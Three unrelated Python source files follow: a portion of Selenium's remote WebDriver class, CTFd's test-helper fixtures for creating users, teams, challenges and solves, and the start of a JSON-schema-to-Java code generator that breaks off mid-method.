"""
Get a single cookie by name. Returns the cookie if found, None if not.
:Usage:
driver.get_cookie('my_cookie')
"""
cookies = self.get_cookies()
for cookie in cookies:
if cookie['name'] == name:
return cookie
return None
def delete_cookie(self, name):
"""
Deletes a single cookie with the given name.
:Usage:
driver.delete_cookie('my_cookie')
"""
self.execute(Command.DELETE_COOKIE, {'name': name})
def delete_all_cookies(self):
"""
Delete all cookies in the scope of the session.
:Usage:
driver.delete_all_cookies()
"""
self.execute(Command.DELETE_ALL_COOKIES)
def add_cookie(self, cookie_dict):
"""
Adds a cookie to your current session.
:Args:
- cookie_dict: A dictionary object, with required keys - "name" and "value";
optional keys - "path", "domain", "secure", "expiry"
Usage:
driver.add_cookie({'name' : 'foo', 'value' : 'bar'})
driver.add_cookie({'name' : 'foo', 'value' : 'bar', 'path' : '/'})
driver.add_cookie({'name' : 'foo', 'value' : 'bar', 'path' : '/', 'secure':True})
"""
self.execute(Command.ADD_COOKIE, {'cookie': cookie_dict})
# Timeouts
def implicitly_wait(self, time_to_wait):
"""
Sets a sticky timeout to implicitly wait for an element to be found,
or a command to complete. This method only needs to be called one
time per session. To set the timeout for calls to
execute_async_script, see set_script_timeout.
:Args:
- time_to_wait: Amount of time to wait (in seconds)
:Usage:
driver.implicitly_wait(30)
"""
if self.w3c:
self.execute(Command.SET_TIMEOUTS,
{'ms': float(time_to_wait) * 1000, 'type':'implicit'})
else:
self.execute(Command.IMPLICIT_WAIT, {'ms': float(time_to_wait) * 1000})
def set_script_timeout(self, time_to_wait):
"""
Set the amount of time that the script should wait during an
execute_async_script call before throwing an error.
:Args:
- time_to_wait: The amount of time to wait (in seconds)
:Usage:
driver.set_script_timeout(30)
"""
if self.w3c:
self.execute(Command.SET_TIMEOUTS,
{'ms': float(time_to_wait) * 1000, 'type':'script'})
else:
self.execute(Command.SET_SCRIPT_TIMEOUT,
{'ms': float(time_to_wait) * 1000})
def set_page_load_timeout(self, time_to_wait):
"""
Set the amount of time to wait for a page load to complete
before throwing an error.
:Args:
- time_to_wait: The amount of time to wait
:Usage:
driver.set_page_load_timeout(30)
"""
self.execute(Command.SET_TIMEOUTS,
{'ms': float(time_to_wait) * 1000, 'type':'page load'})
def find_element(self, by=By.ID, value=None):
"""
'Private' method used by the find_element_by_* methods.
:Usage:
Use the corresponding find_element_by_* instead of this.
:rtype: WebElement
"""
if not By.is_valid(by) or not isinstance(value, str):
raise InvalidSelectorException("Invalid locator values passed in")
if self.w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self.execute(Command.FIND_ELEMENT,
{'using': by, 'value': value})['value']
def find_elements(self, by=By.ID, value=None):
"""
'Private' method used by the find_elements_by_* methods.
:Usage:
Use the corresponding find_elements_by_* instead of this.
:rtype: list of WebElement
"""
if not By.is_valid(by) or not isinstance(value, str):
raise InvalidSelectorException("Invalid locator values passed in")
if self.w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self.execute(Command.FIND_ELEMENTS,
{'using': by, 'value': value})['value']
@property
def desired_capabilities(self):
"""
        Returns the driver's current desired capabilities being used.
"""
return self.capabilities
def get_screenshot_as_file(self, filename):
"""
Gets the screenshot of the current window. Returns False if there is
any IOError, else returns True. Use full paths in your filename.
:Args:
- filename: The full path you wish to save your screenshot to.
:Usage:
driver.get_screenshot_as_file('/Screenshots/foo.png')
"""
png = self.get_screenshot_as_png()
try:
with open(filename, 'wb') as f:
f.write(png)
except IOError:
return False
finally:
del png
return True
save_screenshot = get_screenshot_as_file
def get_screenshot_as_png(self):
"""
        Gets the screenshot of the current window as binary data.
:Usage:
driver.get_screenshot_as_png()
"""
return base64.b64decode(self.get_screenshot_as_base64().encode('ascii'))
def get_screenshot_as_base64(self):
"""
Gets the screenshot of the current window as a base64 encoded string
        which is useful for embedding images in HTML.
:Usage:
driver.get_screenshot_as_base64()
"""
return self.execute(Command.SCREENSHOT)['value']
def set_window_size(self, width, height, windowHandle='current'):
"""
Sets the width and height of the current window. (window.resizeTo)
:Args:
- width: the width in pixels to set the window to
- height: the height in pixels to set the window to
:Usage:
driver.set_window_size(800,600)
"""
command = Command.SET_WINDOW_SIZE
if self.w3c:
command = Command.W3C_SET_WINDOW_SIZE
self.execute(command, {'width': int(width), 'height': int(height),
'windowHandle': windowHandle})
def get_window_size(self, windowHandle='current'):
"""
Gets the width and height of the current window.
:Usage:
driver.get_window_size()
"""
command = Command.GET_WINDOW_SIZE
if self.w3c:
command = Command.W3C_GET_WINDOW_SIZE
size = self.execute(command,
{'windowHandle': windowHandle})
        if size.get('value', None) is not None:
return size['value']
else:
return size
def set_window_position(self, x, y, windowHandle='current'):
"""
Sets the x,y position of the current window. (window.moveTo)
:Args:
- x: the x-coordinate in pixels to set the window position
- y: the y-coordinate in pixels to set the window position
:Usage:
driver.set_window_position(0,0)
"""
self.execute(Command.SET_WINDOW_POSITION, {'x': int(x), 'y': int(y),
'windowHandle': windowHandle})
def get_window_position(self, windowHandle='current'):
"""
Gets the x,y position of the current window.
:Usage:
driver.get_window_position()
"""
return self.execute(Command.GET_WINDOW_POSITION,
{'windowHandle': windowHandle})['value']
@property
def file_detector(self):
return self._file_detector
@file_detector.setter
def file_detector(self, detector):
"""
Set the file detector to be used when sending keyboard input.
By default, this is set to a file detector that does nothing.
see FileDetector
see LocalFileDetector
see UselessFileDetector
:Args:
- detector: The detector to use. Must not be None.
"""
        if detector is None:
raise WebDriverException("You may not set a file detector that is null")
if not isinstance(detector, FileDetector):
raise WebDriverException("Detector has to be instance of FileDetector")
        self._file_detector = detector
@property
def orientation(self):
"""
Gets the current orientation of the device
:Usage:
orientation = driver.orientation
"""
return self.execute(Command.GET_SCREEN_ORIENTATION)['value']
@orientation.setter
def orientation(self, value):
"""
Sets the current orientation of the device
:Args:
- value: orientation to set it to.
:Usage:
driver.orientation = 'landscape'
"""
allowed_values = ['LANDSCAPE', 'PORTRAIT']
if value.upper() in allowed_values:
self.execute(Command.SET_SCREEN_ORIENTATION, {'orientation': value})
else:
raise WebDriverException("You can only set the orientation to 'LANDSCAPE' and 'PORTRAIT'")
@property
def application_cache(self):
""" Returns a ApplicationCache Object to interact with the browser app cache"""
return ApplicationCache(self)
@property
def log_types(self):
"""
Gets a list of the available log types
:Usage:
driver.log_types
"""
return self.execute(Command.GET_AVAILABLE_LOG_TYPES)['value']
def get_log(self, log_type):
"""
Gets the log for a given log type
:Args:
         - log_type: type of log that will be returned
:Usage:
driver.get_log('browser')
driver.get_log('driver')
driver.get_log('client')
driver.get_log('server')
"""
return self.execute(Command.GET_LOG, {'type': log_type})['value']
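# Illustrative usage of this class through the public selenium package (a
# sketch only; it assumes a remote Selenium server is listening on the default
# URL and that Firefox is available on that node):
#
#     from selenium import webdriver
#     driver = webdriver.Remote(
#         command_executor='http://127.0.0.1:4444/wd/hub',
#         desired_capabilities={'browserName': 'firefox'})
#     driver.get('http://example.com')
#     print(driver.title)
#     driver.quit()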
|
|
import datetime
import gc
import random
import string
import uuid
from collections import namedtuple
from contextlib import contextmanager
from unittest.mock import Mock, patch
import requests
from flask.testing import FlaskClient
from freezegun import freeze_time
from sqlalchemy.engine.url import make_url
from sqlalchemy_utils import drop_database
from werkzeug.datastructures import Headers
from CTFd import create_app
from CTFd.cache import cache, clear_standings
from CTFd.config import TestingConfig
from CTFd.models import (
Awards,
ChallengeComments,
ChallengeFiles,
Challenges,
ChallengeTopics,
Comments,
Fails,
Fields,
Files,
Flags,
Hints,
Notifications,
PageComments,
PageFiles,
Pages,
Solves,
Tags,
TeamComments,
Teams,
Tokens,
Topics,
Tracking,
Unlocks,
UserComments,
Users,
)
from CTFd.utils import set_config
from tests.constants.time import FreezeTimes
text_type = str
binary_type = bytes
FakeRequest = namedtuple("FakeRequest", ["form"])
class CTFdTestClient(FlaskClient):
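    """Flask test client that, for JSON requests, copies the CSRF nonce from
    the session into a CSRF-Token header so API calls pass CTFd's CSRF check."""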
def open(self, *args, **kwargs):
if kwargs.get("json") is not None:
with self.session_transaction() as sess:
api_key_headers = Headers({"CSRF-Token": sess.get("nonce")})
headers = kwargs.pop("headers", Headers())
if isinstance(headers, dict):
headers = Headers(headers)
headers.extend(api_key_headers)
kwargs["headers"] = headers
return super(CTFdTestClient, self).open(*args, **kwargs)
class ctftime:
@contextmanager
def init():
"""
This context manager can be used to setup start and end dates for a test CTFd
"""
try:
set_config("start", FreezeTimes.START)
set_config("end", FreezeTimes.END)
yield
finally:
set_config("start", None)
set_config("end", None)
@contextmanager
def not_started():
"""
This context manager sets the current time to before the start date of the test CTFd
"""
try:
freezer = freeze_time(FreezeTimes.NOT_STARTED)
frozen_time = freezer.start()
yield frozen_time
finally:
freezer.stop()
@contextmanager
def started():
"""
This context manager sets the current time to the start date of the test CTFd
"""
try:
freezer = freeze_time(FreezeTimes.STARTED)
frozen_time = freezer.start()
yield frozen_time
finally:
freezer.stop()
@contextmanager
def ended():
"""
This context manager sets the current time to after the end date of the test CTFd
"""
try:
freezer = freeze_time(FreezeTimes.ENDED)
frozen_time = freezer.start()
yield frozen_time
finally:
freezer.stop()
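# Illustrative use of the ctftime helpers above (a sketch): wrap a test body in
# ctftime.init() to configure start/end dates, then freeze the clock inside one
# of the phases:
#
#     with ctftime.init(), ctftime.started():
#         ...  # requests made here see a running CTF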
def create_ctfd(
ctf_name="CTFd",
ctf_description="CTF description",
name="admin",
email="[email protected]",
password="password",
user_mode="users",
setup=True,
enable_plugins=False,
application_root="/",
config=TestingConfig,
):
if enable_plugins:
config.SAFE_MODE = False
else:
config.SAFE_MODE = True
config.APPLICATION_ROOT = application_root
url = make_url(config.SQLALCHEMY_DATABASE_URI)
if url.database:
url.database = str(uuid.uuid4())
config.SQLALCHEMY_DATABASE_URI = str(url)
app = create_app(config)
app.test_client_class = CTFdTestClient
if setup:
app = setup_ctfd(
app,
ctf_name=ctf_name,
ctf_description=ctf_description,
name=name,
email=email,
password=password,
user_mode=user_mode,
)
return app
def setup_ctfd(
app,
ctf_name="CTFd",
ctf_description="CTF description",
name="admin",
email="[email protected]",
password="password",
user_mode="users",
):
with app.app_context():
with app.test_client() as client:
client.get("/setup") # Populate session with nonce
with client.session_transaction() as sess:
data = {
"ctf_name": ctf_name,
"ctf_description": ctf_description,
"name": name,
"email": email,
"password": password,
"user_mode": user_mode,
"nonce": sess.get("nonce"),
}
client.post("/setup", data=data)
return app
def destroy_ctfd(app):
with app.app_context():
gc.collect() # Garbage collect (necessary in the case of dataset freezes to clean database connections)
cache.clear()
drop_database(app.config["SQLALCHEMY_DATABASE_URI"])
def register_user(
app,
name="user",
email="[email protected]",
password="password",
raise_for_error=True,
):
with app.app_context():
with app.test_client() as client:
client.get("/register")
with client.session_transaction() as sess:
data = {
"name": name,
"email": email,
"password": password,
"nonce": sess.get("nonce"),
}
client.post("/register", data=data)
if raise_for_error:
with client.session_transaction() as sess:
assert sess["id"]
assert sess["nonce"]
assert sess["hash"]
def register_team(app, name="team", password="password", raise_for_error=True):
with app.app_context():
with app.test_client() as client:
client.get("/team")
with client.session_transaction() as sess:
data = {"name": name, "password": password, "nonce": sess.get("nonce")}
r = client.post("/teams/new", data=data)
if raise_for_error:
assert r.status_code == 302
return client
def login_as_user(app, name="user", password="password", raise_for_error=True):
with app.app_context():
with app.test_client() as client:
client.get("/login")
with client.session_transaction() as sess:
data = {"name": name, "password": password, "nonce": sess.get("nonce")}
client.post("/login", data=data)
if raise_for_error:
with client.session_transaction() as sess:
assert sess["id"]
assert sess["nonce"]
assert sess["hash"]
return client
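# Typical lifecycle built from the helpers above (an illustrative sketch; the
# route fetched at the end is only an example):
#
#     def test_example():
#         app = create_ctfd()
#         with app.app_context():
#             register_user(app)
#             client = login_as_user(app)
#             r = client.get("/challenges")
#             assert r.status_code == 200
#         destroy_ctfd(app)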
def login_with_mlc(
app,
name="user",
scope="profile%20team",
email="[email protected]",
oauth_id=1337,
team_name="TestTeam",
team_oauth_id=1234,
raise_for_error=True,
):
with app.test_client() as client, patch.object(
requests, "get"
) as fake_get_request, patch.object(requests, "post") as fake_post_request:
client.get("/login")
with client.session_transaction() as sess:
nonce = sess["nonce"]
redirect_url = "{endpoint}?response_type=code&client_id={client_id}&scope={scope}&state={state}".format(
endpoint=app.config["OAUTH_AUTHORIZATION_ENDPOINT"],
client_id=app.config["OAUTH_CLIENT_ID"],
scope=scope,
state=nonce,
)
r = client.get("/oauth", follow_redirects=False)
assert r.location == redirect_url
fake_post_response = Mock()
fake_post_request.return_value = fake_post_response
fake_post_response.status_code = 200
fake_post_response.json = lambda: {"access_token": "fake_mlc_access_token"}
fake_get_response = Mock()
fake_get_request.return_value = fake_get_response
fake_get_response.status_code = 200
fake_get_response.json = lambda: {
"id": oauth_id,
"name": name,
"email": email,
"team": {"id": team_oauth_id, "name": team_name},
}
client.get(
"/redirect?code={code}&state={state}".format(
code="mlc_test_code", state=nonce
),
follow_redirects=False,
)
if raise_for_error:
with client.session_transaction() as sess:
assert sess["id"]
assert sess["nonce"]
assert sess["hash"]
return client
def get_scores(user):
r = user.get("/api/v1/scoreboard")
scores = r.get_json()
return scores["data"]
def random_string(n=5):
return "".join(
random.choice(string.ascii_letters + string.digits) for _ in range(n)
)
def random_int(start=2147483647, stop=None, step=1):
return random.randrange(start, stop, step)
def gen_challenge(
db,
name="chal_name",
description="chal_description",
value=100,
category="chal_category",
type="standard",
state="visible",
**kwargs
):
chal = Challenges(
name=name,
description=description,
value=value,
category=category,
type=type,
state=state,
**kwargs
)
db.session.add(chal)
db.session.commit()
return chal
def gen_award(db, user_id, team_id=None, name="award_name", value=100):
award = Awards(user_id=user_id, team_id=team_id, name=name, value=value)
award.date = datetime.datetime.utcnow()
db.session.add(award)
db.session.commit()
clear_standings()
return award
def gen_tag(db, challenge_id, value="tag_tag", **kwargs):
tag = Tags(challenge_id=challenge_id, value=value, **kwargs)
db.session.add(tag)
db.session.commit()
return tag
def gen_topic(db, challenge_id, value="topic", **kwargs):
topic = Topics(value=value, **kwargs)
db.session.add(topic)
db.session.commit()
challenge_topic = ChallengeTopics(challenge_id=challenge_id, topic_id=topic.id)
db.session.add(challenge_topic)
db.session.commit()
return challenge_topic
def gen_file(db, location, challenge_id=None, page_id=None):
if challenge_id:
f = ChallengeFiles(challenge_id=challenge_id, location=location)
elif page_id:
f = PageFiles(page_id=page_id, location=location)
else:
f = Files(location=location)
db.session.add(f)
db.session.commit()
return f
def gen_flag(db, challenge_id, content="flag", type="static", data=None, **kwargs):
flag = Flags(challenge_id=challenge_id, content=content, type=type, **kwargs)
if data:
flag.data = data
db.session.add(flag)
db.session.commit()
return flag
def gen_user(
db, name="user_name", email="[email protected]", password="password", **kwargs
):
user = Users(name=name, email=email, password=password, **kwargs)
db.session.add(user)
db.session.commit()
return user
def gen_team(
db,
name="team_name",
email="[email protected]",
password="password",
member_count=4,
**kwargs
):
team = Teams(name=name, email=email, password=password, **kwargs)
for i in range(member_count):
name = "user-{}-{}".format(random_string(), str(i))
user = gen_user(db, name=name, email=name + "@examplectf.com", team_id=team.id)
if i == 0:
team.captain_id = user.id
team.members.append(user)
db.session.add(team)
db.session.commit()
return team
def gen_hint(
db, challenge_id, content="This is a hint", cost=0, type="standard", **kwargs
):
hint = Hints(
challenge_id=challenge_id, content=content, cost=cost, type=type, **kwargs
)
db.session.add(hint)
db.session.commit()
return hint
def gen_unlock(db, user_id, team_id=None, target=None, type="hints"):
unlock = Unlocks(user_id=user_id, team_id=team_id, target=target, type=type)
db.session.add(unlock)
db.session.commit()
return unlock
def gen_solve(
db,
user_id,
team_id=None,
challenge_id=None,
ip="127.0.0.1",
provided="rightkey",
**kwargs
):
solve = Solves(
user_id=user_id,
team_id=team_id,
challenge_id=challenge_id,
ip=ip,
provided=provided,
**kwargs
)
solve.date = datetime.datetime.utcnow()
db.session.add(solve)
db.session.commit()
clear_standings()
return solve
def gen_fail(
db,
user_id,
team_id=None,
challenge_id=None,
ip="127.0.0.1",
provided="wrongkey",
**kwargs
):
fail = Fails(
user_id=user_id,
team_id=team_id,
challenge_id=challenge_id,
ip=ip,
provided=provided,
**kwargs
)
fail.date = datetime.datetime.utcnow()
db.session.add(fail)
db.session.commit()
return fail
def gen_tracking(db, user_id=None, ip="127.0.0.1", **kwargs):
tracking = Tracking(ip=ip, user_id=user_id, **kwargs)
db.session.add(tracking)
db.session.commit()
return tracking
def gen_page(db, title, route, content, draft=False, auth_required=False, **kwargs):
page = Pages(
title=title,
route=route,
content=content,
draft=draft,
auth_required=auth_required,
**kwargs
)
db.session.add(page)
db.session.commit()
return page
def gen_notification(db, title="title", content="content"):
notif = Notifications(title=title, content=content)
db.session.add(notif)
db.session.commit()
def gen_token(db, type="user", user_id=None, expiration=None):
token = Tokens(type=type, user_id=user_id, expiration=expiration)
db.session.add(token)
db.session.commit()
return token
def gen_comment(db, content="comment", author_id=None, type="challenge", **kwargs):
if type == "challenge":
model = ChallengeComments
elif type == "user":
model = UserComments
elif type == "team":
model = TeamComments
elif type == "page":
model = PageComments
else:
model = Comments
comment = model(content=content, author_id=author_id, type=type, **kwargs)
db.session.add(comment)
db.session.commit()
return comment
def gen_field(
db,
name="CustomField",
type="user",
field_type="text",
description="CustomFieldDescription",
required=True,
public=True,
editable=True,
):
field = Fields(
name=name,
type=type,
field_type=field_type,
description=description,
required=required,
public=public,
editable=editable,
)
db.session.add(field)
db.session.commit()
return field
def simulate_user_activity(db, user):
gen_tracking(db, user_id=user.id)
gen_award(db, user_id=user.id)
challenge = gen_challenge(db)
flag = gen_flag(db, challenge_id=challenge.id)
hint = gen_hint(db, challenge_id=challenge.id)
for _ in range(5):
gen_fail(db, user_id=user.id, challenge_id=challenge.id)
gen_unlock(db, user_id=user.id, target=hint.id, type="hints")
gen_solve(db, user_id=user.id, challenge_id=challenge.id, provided=flag.content)
|
|
'''
The MIT License (MIT)
Copyright (c) 2013 SinnerSchrader Mobile GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import time
import datetime
import os
class JavaCodeGenerator:
naturalList = ["Object", "String", "double", "boolean", "Double", "Boolean"]
projectPrefix = ""
dirPath = ""
memberVariables = ""
isChild = False
isAbstract = False
def getCommonDescriptionString(self):
today = datetime.date.fromtimestamp(time.time())
commonDescription = "/*\n * Created by MetaJSONParser on " + today.strftime("%d.%m.%Y") + "."
commonDescription += "\n * Copyright (c) " + str(today.year) + " SinnerSchrader Mobile. All rights reserved.\n*/\n"
return commonDescription
def make(self, schemeObj):
self.makeInternal(schemeObj)
self.makeExtension(schemeObj)
return True
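    # make() is the entry point: callers are expected to set dirPath (the
    # output package directory) and projectPrefix (a class-name prefix) before
    # calling make(schemeObj) once per scheme. makeInternal() writes an
    # abstract base class into <dirPath>/internal and makeExtension() writes
    # the concrete subclass that extends it into <dirPath>.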
def makeInternal(self, schemeObj):
self.isAbstract = True
sourceString = ""
        self.isChild = False
        print("starting: " + self.getClassName(schemeObj))
if len(self.dirPath) > 0:
sourceString += "package " + self.dirPath.replace("/", ".") + ".internal;\n\n"
sourceString += self.getCommonDescriptionString()
sourceString += self.getImports(schemeObj)
sourceString += self.getClassDefinition(schemeObj)
methodString = "";
self.memberVariables = ""
for prop in schemeObj.props:
methodString += self.getMethod(schemeObj, prop)
for variable in self.memberVariables.split("\n"):
if len(variable) > 0:
sourceString += self.indent(1) + variable + ";"
sourceString += "\n"
setterString = "";
getterString = "";
for variable in self.memberVariables.split("\n"):
setterString += self.createSetter(variable)
getterString += self.createGetter(variable)
sourceString += self.getConstructor(schemeObj)
sourceString += setterString
sourceString += getterString
# end class body
sourceString += "}\n"
if not os.path.exists(self.dirPath + "/internal"):
os.makedirs(self.dirPath + "/internal")
try:
sourceFile = open(self.dirPath + "/internal/" + self.getClassName(schemeObj) + ".java", "w")
sourceFile.write(sourceString) # Write a string to a file
finally:
sourceFile.close()
def makeExtension(self, schemeObj):
sourceString = ""
        self.isChild = False
        self.isAbstract = False
        print("extending: " + self.getClassName(schemeObj))
if len(self.dirPath) > 0:
sourceString += "package " + self.dirPath.replace("/", ".") + ";\n\n"
sourceString += self.getCommonDescriptionString()
sourceString += self.getImports(schemeObj)
sourceString += "import " + self.dirPath.replace("/", ".") + ".internal.Abstract" + self.getClassName(schemeObj) + ";\n"
sourceString += "\npublic class " + self.getClassName(schemeObj)
sourceString += " extends Abstract" + self.getClassName(schemeObj)
sourceString += " {\n"
sourceString += self.indent(1) + "public " + self.getClassName(schemeObj) + "(JSONObject json) throws JSONException {"
sourceString += self.indent(2) + "super(json);"
sourceString += self.indent(1) + "}\n"
# end class body
sourceString += "}\n"
try:
sourceFile = open(self.dirPath + "/" + self.getClassName(schemeObj) + ".java", "w")
sourceFile.write(sourceString) # Write a string to a file
finally:
sourceFile.close()
def getClassDefinition(self, schemeObj):
abstract = ""
classDef = "\npublic class " + self.getClassName(schemeObj)
if self.isAbstract is True:
abstract = "Abstract"
classDef = "\npublic abstract class " + self.getClassName(schemeObj)
if schemeObj.base_type != "object":
self.isChild = True
classDef += " extends " + abstract + self.projectPrefix + self.cap(schemeObj.base_type)
classDef += " {\n"
return classDef
def getMethod(self, schemeObj, prop=None):
source = ""
if len(prop.getBaseTypes()) == 0:
# only one base type
source += self.getMethodForBaseType(schemeObj, prop, prop.base_type)
else:
# multiple base types
for baseType in prop.getBaseTypes():
if schemeObj.hasScheme(baseType):
baseTypeScheme = schemeObj.getScheme(baseType)
objectName = self.convertToJavaType(baseTypeScheme.type_name)
className = self.projectPrefix + self.cap(self.convertToJavaType(baseTypeScheme.type_name))
if len(baseTypeScheme.getBaseTypes()) == 0:
if self.convertToJavaType(baseTypeScheme.base_type) == "array":
for subType in baseTypeScheme.sub_type:
className = self.cap(subType)
projectPrefix = ""
if schemeObj.hasScheme(subType) and len(schemeObj.getScheme(subType).props) > 0:
projectPrefix = self.projectPrefix
self.addOrIgnoreMemberVariable("private", "ArrayList<" + projectPrefix + className + ">", self.getVariableName(prop.type_name) + "As" + className)
if prop.required is True:
source += self.indent(2) + "final JSONArray " + self.getVariableName(prop.type_name) + "As" + className + "Array = json.getJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
else:
extraIndent = " "
source += self.indent(2) + "final JSONArray " + self.getVariableName(prop.type_name) + "As" + className + "Array = json.optJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "As" + className + "Array == null) {"
source += self.indent(3) + self.getVariableName(prop.type_name) + "As" + className + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(2) + extraIndent + self.getVariableName(prop.type_name) + "As" + className + " = new ArrayList<" + projectPrefix + className + ">(" + self.getVariableName(prop.type_name) + "As" + className + "Array.length());"
source += self.indent(2) + extraIndent + "for (int i = 0; i < " + self.getVariableName(prop.type_name) + "As" + className + "Array.length(); i++) {"
if self.isNatural(className):
source += self.indent(3) + extraIndent + self.getVariableName(prop.type_name) + "As" + className + ".add(" + self.getVariableName(prop.type_name) + "As" + className + "Array.get" + className + "(i));"
else:
source += self.indent(3) + extraIndent + self.getVariableName(prop.type_name) + "As" + className + ".add(new " + projectPrefix + className + "(" + self.getVariableName(prop.type_name) + "As" + className + "Array.getJSONObject(i)));"
source += self.indent(2) + extraIndent + "}"
source += self.indent(2) + "}"
return source
variableName = self.getVariableName(prop.type_name) + "As" + self.cap(objectName)
self.addOrIgnoreMemberVariable("private", self.cap(className), variableName)
getType = "opt"
if prop.required is True:
getType = "get"
if self.isNatural(className):
source += self.getSchemeLimitationBody(schemeObj, baseTypeScheme)
else:
source += self.indent(2) + variableName + " = new " + self.projectPrefix + self.cap(self.convertToJavaType(baseTypeScheme.type_name)) + "(json.getJSONObject(\"" + self.getVariableName(prop.type_name) + "\"));"
else:
asString = ""
if self.convertToJavaType(baseTypeScheme.base_type) == "multi":
asString = "As" + className
projectPrefix = ""
if baseTypeScheme.isNaturalType() is False:
projectPrefix = self.projectPrefix
self.addOrIgnoreMemberVariable("private", projectPrefix + className, self.getVariableName(prop.type_name) + asString)
if prop.required is True:
source += self.indent(2) + self.getVariableName(prop.type_name) + " = new " + projectPrefix + className + "(json.getJSONObject(\"" + self.getVariableName(prop.type_name) + "\"));"
else:
source += self.indent(2) + "final JSONObject " + self.getVariableName(prop.type_name) + "JsonObject = json.optJSONObject(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + self.getVariableName(prop.type_name) + "JsonObject == null) {"
source += self.indent(3) + "return null;"
source += self.indent(2) + "} else {"
source += self.indent(3) + self.getVariableName(prop.type_name) + " = new " + projectPrefix + className + "(" + self.getVariableName(prop.type_name) + "JsonObject);"
source += self.indent(2) + "}"
else:
className = self.convertToJavaType(baseType)
variableName = self.getVariableName(prop.type_name) + "As" + self.cap(className)
if self.low(className) == "byte":
self.addOrIgnoreMemberVariable("private", "byte[]", variableName)
else:
self.addOrIgnoreMemberVariable("private", self.cap(className), variableName)
getType = "opt"
if prop.required is True:
getType = "get"
if self.isNatural(baseType):
source += self.indent(2) + variableName + " = json." + getType + self.cap(className) + "(\"" + self.getVariableName(prop.type_name) + "\");"
else:
if self.low(className) == "date":
source += self.indent(2) + variableName + " = new Date(json." + getType + "Long(\"" + self.getVariableName(prop.type_name) + "\"));"
elif self.low(className) == "byte":
source += self.indent(2) + variableName + " = json." + getType + "String(\"" + self.getVariableName(prop.type_name) + "\").getBytes();"
else:
source += self.indent(2) + variableName + " = json." + getType + self.cap(className) + "(\"" + self.getVariableName(prop.type_name) + "\");"
return source
def getSchemeLimitationBody(self, schemeObj, prop):
className = self.convertToJavaType(prop.base_type)
varName = self.getVariableName(prop.type_name)
source = self.indent(2) + varName + " = json.get" + className + "(\"" + varName + "\");"
if prop.base_type == "array":
if prop.hasMinCount:
source += self.indent(2) + "if (" + varName + ".length < " + str(prop.minCount) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be less than " + str(prop.minCount) + "\");"
source += self.indent(2) + "}"
if prop.hasMaxCount:
source += self.indent(2) + "if (" + varName + ".length > " + str(prop.maxCount) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be bigger than " + str(prop.maxCount) + "\");"
source += self.indent(2) + "}"
if prop.hasMinLength:
source += self.indent(2) + "if (" + varName + ".length() < " + str(prop.minLength) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be shorter than " + str(prop.minLength) + "\");"
source += self.indent(2) + "}"
if prop.hasMaxLength:
source += self.indent(2) + "if (" + varName + ".length() > " + str(prop.maxLength) + ") {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " can't be longer than " + str(prop.maxLength) + "\");"
source += self.indent(2) + "}"
if prop.regex:
source += self.indent(2) + "if (!Pattern.compile(\"" + prop.regex + "\").matcher(" + varName + ").matches()) {"
source += self.indent(3) + "throw new IllegalArgumentException(\"" + varName + " doesn't fit regex " + prop.regex + "\");"
source += self.indent(2) + "}"
source += self.indent(2) + "return " + varName + ";"
return source
def getMethodForBaseType(self, schemeObj, prop, typeName):
source = ""
baseType = typeName
typeClassName = self.cap(self.convertToJavaType(typeName))
if baseType == "array":
for subType in prop.sub_type:
objectName = self.convertToJavaType(subType)
className = self.cap(objectName)
projectPrefix = ""
if schemeObj.hasScheme(subType) and len(schemeObj.getScheme(subType).props) > 0:
projectPrefix = self.projectPrefix
variableName = self.getVariableName(prop.type_name) + "As" + self.cap(subType)
self.addOrIgnoreMemberVariable("private", "ArrayList<" + projectPrefix + className + ">", variableName)
extraIndent = ""
if prop.required is True:
source += self.indent(2) + "final JSONArray " + variableName + "Array = json.getJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
else:
extraIndent = " "
source += self.indent(2) + "final JSONArray " + variableName + "Array = json.optJSONArray(\"" + self.getVariableName(prop.type_name) + "\");"
source += self.indent(2) + "if (" + variableName + "Array == null) {"
source += self.indent(3) + variableName + " = null;"
source += self.indent(2) + "} else {"
source += self.indent(2) + extraIndent + variableName + " = new ArrayList<" + projectPrefix + className + ">(" + variableName + "Array.length());"
source += self.indent(2) + extraIndent + "for (int i = 0; i < " + variableName + "Array.length(); i++) {"
if self.isNatural(className):
if className == "Object":
className = ""
source += self.indent(3) + extraIndent + variableName + ".add(" + variableName + "Array.get" + className + "(i));"
else:
